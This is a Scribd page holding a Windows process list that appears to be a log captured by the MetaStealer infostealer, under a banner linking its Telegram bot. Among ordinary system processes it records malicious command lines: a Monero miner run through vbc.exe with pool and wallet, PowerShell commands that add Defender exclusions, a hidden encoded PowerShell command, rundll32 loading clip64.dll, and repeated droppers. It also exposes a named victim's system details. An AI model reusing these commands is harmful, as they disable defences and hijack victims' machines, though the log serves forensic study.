Scribd
Upload
76 views

Process List

The document lists process information from a Windows system, including the process ID, name, and command line. It shows many instances of a process called oneetx.exe running from a temp folder, which is suspicious. The document provides forensic details that could help analyze the system's state.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
76 views

Process List

The document lists process information from a Windows system, including the process ID, name, and command line. It shows many instances of a process called oneetx.exe running from a temp folder, which is suspicious. The document provides forensic details that could help analyze the system's state.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 608, Name: csrss.exe, CommandLine:


===============
ID: 696, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 860, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1856, Name: NVDisplay.Container.exe, CommandLine: "C:\Program Files\NVIDIA
Corporation\Display.NvContainer\NVDisplay.Container.exe" -f "C:\ProgramData\NVIDIA\
DisplaySessionContainer%d.log" -d "C:\Program Files\NVIDIA Corporation\
Display.NvContainer\plugins\Session" -r -l 3 -p 30000 -c
===============
ID: 4328, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4376, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 4404, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 4520, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 4776, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 4964, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 596, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 5256, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 5552, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 5632, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 1212, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 4972, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6376, Name: SkypeApp.exe, CommandLine:
===============
ID: 7104, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 2960, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 6708, Name: RAVCpl64.exe, CommandLine: "C:\Program Files\Realtek\Audio\HDA\
RAVCpl64.exe" -s
===============
ID: 1816, Name: OneDrive.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 7412, Name: IDMan.exe, CommandLine: "C:\Program Files (x86)\Internet Download
Manager\IDMan.exe" /onboot
===============
ID: 8004, Name: IEMonitor.exe, CommandLine: "C:\Program Files (x86)\Internet
Download Manager\IEMonitor.exe"
===============
ID: 8636, Name: explorer.exe, CommandLine: "C:\Windows\explorer.exe"
===============
ID: 6128, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 9732, Name: explorer.exe, CommandLine: "C:\Windows\Resources\Themes\
explorer.exe"
===============
ID: 10216, Name: svchost.exe, CommandLine: c:\windows\resources\svchost.exe
===============
ID: 8504, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 7960, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup
===============
ID: 1464, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 7656, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 2752, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca
===============
ID: 9364, Name: LocationNotificationWindows.exe, CommandLine: C:\Windows\System32\
LocationNotificationWindows.exe
===============
ID: 8344, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 3944, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 9536, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 9576, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 9744, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 3972, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 3856, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 2372, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 7764, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 9396, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 5528, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 2232, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 6580, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 5272, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 176, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 9040, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 3044, Name: FileCoAuth.exe, CommandLine: "C:\Users\dinoj\AppData\Local\
Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe" -Embedding
===============
ID: 2640, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 9724, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 5572, Name: rundll32.exe, CommandLine: "C:\Windows\System32\rundll32.exe" C:\
Users\dinoj\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
===============
ID: 6628, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 4960, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 9108, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 7088, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 7992, Name: TFT_MTK_v5.exe, CommandLine: "C:\TFT_MTKv5\TFT_MTK_v5.exe"
===============
ID: 5816, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5180, Name: mmc.exe, CommandLine: "C:\Windows\system32\mmc.exe" C:\Windows\
system32\devmgmt.msc
===============
ID: 10728, Name: Taskmgr.exe, CommandLine: "C:\Windows\system32\taskmgr.exe" /4
===============
ID: 6844, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 12616, Name: MRoem7RdEoVAYYcFEydbq05F.exe, CommandLine: "C:\Users\dinoj\
OneDrive\Pictures\Minor Policy\MRoem7RdEoVAYYcFEydbq05F.exe"
===============
ID: 12624, Name: ttVNLlmfgxU3M5Gbxntovzxf.exe, CommandLine: "C:\Users\dinoj\
OneDrive\Pictures\Minor Policy\ttVNLlmfgxU3M5Gbxntovzxf.exe"
===============
ID: 12728, Name: is-M92E7.tmp, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\is-
EIOBV.tmp\is-M92E7.tmp" /SL4 $1807E4 "C:\Users\dinoj\OneDrive\Pictures\Minor
Policy\ttVNLlmfgxU3M5Gbxntovzxf.exe" 2562274 56320
===============
ID: 12928, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
ID: 12640, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5
vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 14232, Name: java.exe, CommandLine: C:\Users\dinoj\AppData\Roaming\Java\jre8\
bin\java.exe --expose-gc C:\Users\dinoj\AppData\Roaming\Java\jre8\bin\java.exe:jnl
===============
ID: 12084, Name: 73rO5RQ0h.exe, CommandLine: C:\Users\dinoj\AppData\Local\6e4dc66a-
114f-4d4e-b649-04159caf878c\73rO5RQ0h.exe --Task
===============
ID: 17040, Name: 9sxrTGw3nEjlZqapNtw3DcJr.exe, CommandLine: "C:\Users\dinoj\
OneDrive\Pictures\Minor Policy\9sxrTGw3nEjlZqapNtw3DcJr.exe"
===============
ID: 16520, Name: is-7TBUR.tmp, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\is-
8070R.tmp\is-7TBUR.tmp" /SL4 $1004E8 "C:\Users\dinoj\OneDrive\Pictures\Minor
Policy\9sxrTGw3nEjlZqapNtw3DcJr.exe" 2685655 56320
===============
ID: 13196, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --restore-last-session
===============
ID: 7328, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\dinoj\
AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\dinoj\AppData\Local\Google\
Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\dinoj\AppData\Local\Google\
Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel=
--annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=112.0.5615.138 --
initial-client-
data=0x1a4,0x1a8,0x1ac,0x180,0x1b0,0x7fff85569a60,0x7fff85569a70,0x7fff85569a80
===============
ID: 11796, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-
platform-channel-handle=2060 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:2
===============
ID: 4296, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
platform-channel-handle=2476 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 15672, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --
mojo-platform-channel-handle=2676 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 16620, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --first-renderer-process --video-capture-
use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1
--renderer-client-id=6 --time-ticks-at-unix-epoch=-1681920336100689 --launch-time-
ticks=7605955812 --mojo-platform-channel-handle=3456 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 17940, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --extension-process --video-capture-use-
gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --
renderer-client-id=5 --time-ticks-at-unix-epoch=-1681920336100689 --launch-time-
ticks=7609496029 --mojo-platform-channel-handle=3684 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 14224, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --video-capture-use-gpu-memory-buffer --
lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --
time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7609829133 --mojo-
platform-channel-handle=3836 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 12304, Name: oneetx.exe, CommandLine: C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe
===============
ID: 12180, Name: oneetx.exe, CommandLine: C:\Users\dinoj\AppData\Local\Temp\
cb7ae701b3\oneetx.exe
===============
ID: 17732, Name: WerFault.exe, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p
12304 -s 340
===============
ID: 1788, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --video-capture-use-gpu-memory-buffer --
lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --
time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7692015251 --mojo-
platform-channel-handle=5172 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 13096, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --video-capture-use-gpu-memory-buffer --
lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11
--time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7813928552 --mojo-
platform-channel-handle=4940 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 17928, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService
--lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --
mojo-platform-channel-handle=4800 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 12352, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 20960, Name: backgroundTaskHost.exe, CommandLine: "C:\Windows\system32\
backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
===============
ID: 21124, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 21252, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20664, Name: tasklist.exe, CommandLine: tasklist /fo csv /nh
===============
ID: 16092, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 21324, Name: WBGRGV.exe, CommandLine: C:\ProgramData\portableWin\WBGRGV.exe
===============
ID: 21724, Name: 73rO5RQ0h.exe, CommandLine: C:\Users\dinoj\AppData\Local\6e4dc66a-
114f-4d4e-b649-04159caf878c\73rO5RQ0h.exe --Task
===============
ID: 21896, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-
type=service --video-capture-use-gpu-memory-buffer --mojo-platform-channel-
handle=5140 --field-trial-
handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 22444, Name: nbPC_K7zYSDlnZUbZ0DImshi.exe, CommandLine: "C:\Users\dinoj\
OneDrive\Pictures\Minor Policy\nbPC_K7zYSDlnZUbZ0DImshi.exe"
===============
ID: 22512, Name: _0YVIOahAGtszsZAFB8IPFXO.exe, CommandLine: "C:\Users\dinoj\
OneDrive\Pictures\Minor Policy\_0YVIOahAGtszsZAFB8IPFXO.exe"
===============
ID: 21520, Name: KrzfXiRgtb_0uSauuqlTvCB3.exe, CommandLine: "C:\Users\dinoj\
OneDrive\Pictures\Minor Policy\KrzfXiRgtb_0uSauuqlTvCB3.exe"
===============
ID: 18828, Name: is-B4CNR.tmp, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\is-
FAUAE.tmp\is-B4CNR.tmp" /SL4 $43081E "C:\Users\dinoj\OneDrive\Pictures\Minor
Policy\nbPC_K7zYSDlnZUbZ0DImshi.exe" 2562561 56320
===============
ID: 5328, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 20740, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 21648, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 22204, Name: eggcetr, CommandLine: C:\Users\dinoj\AppData\Roaming\eggcetr
===============
ID: 1388, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\
v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 19448, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1932006262
===============
ID: 21260, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 22024, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4

You might also like